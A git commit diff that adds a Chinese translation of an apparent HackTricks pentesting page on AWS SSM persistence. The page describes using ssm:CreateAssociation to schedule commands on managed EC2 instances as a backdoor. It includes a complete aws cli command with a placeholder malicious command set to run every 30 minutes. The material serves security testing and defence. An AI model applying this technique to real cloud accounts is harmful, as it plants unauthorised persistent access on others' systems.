Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-p

2026-02-05 03:16:37 -08:00 · 2025-07-24 06:50:18 +00:00
parent 3b55e40807
commit 38849afb89
1 changed files with 27 additions and 1 deletions
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
@@ -1 +1,27 @@
-# AWS - SSM 持久性
+# AWS - SSM Perssitence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## SSM
+
+有关更多信息，请查看：
+
+{{#ref}}
+../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
+{{#endref}}
+
+### 使用 ssm:CreateAssociation 进行持久性
+
+具有 ssm:CreateAssociation 权限的攻击者可以创建一个状态管理器关联，以自动在由 SSM 管理的 EC2 实例上执行命令。这些关联可以配置为在固定间隔内运行，使其适合于类似后门的持久性，而无需交互式会话。
+```bash
+aws ssm create-association \
+--name SSM-Document-Name \
+--targets Key=InstanceIds,Values=target-instance-id \
+--parameters commands=["malicious-command"] \
+--schedule-expression "rate(30 minutes)" \
+--association-name association-name
+```
+> [!NOTE]
+> 该持久性方法在 EC2 实例由 Systems Manager 管理、SSM 代理正在运行且攻击者有权限创建关联时有效。它不需要交互式会话或明确的 ssm:SendCommand 权限。**重要：** `--schedule-expression` 参数（例如，`rate(30 minutes)`）必须遵循 AWS 的最小间隔 30 分钟。对于立即或一次性执行，请完全省略 `--schedule-expression` — 关联将在创建后执行一次。
+
+{{#include ../../../banners/hacktricks-training.md}}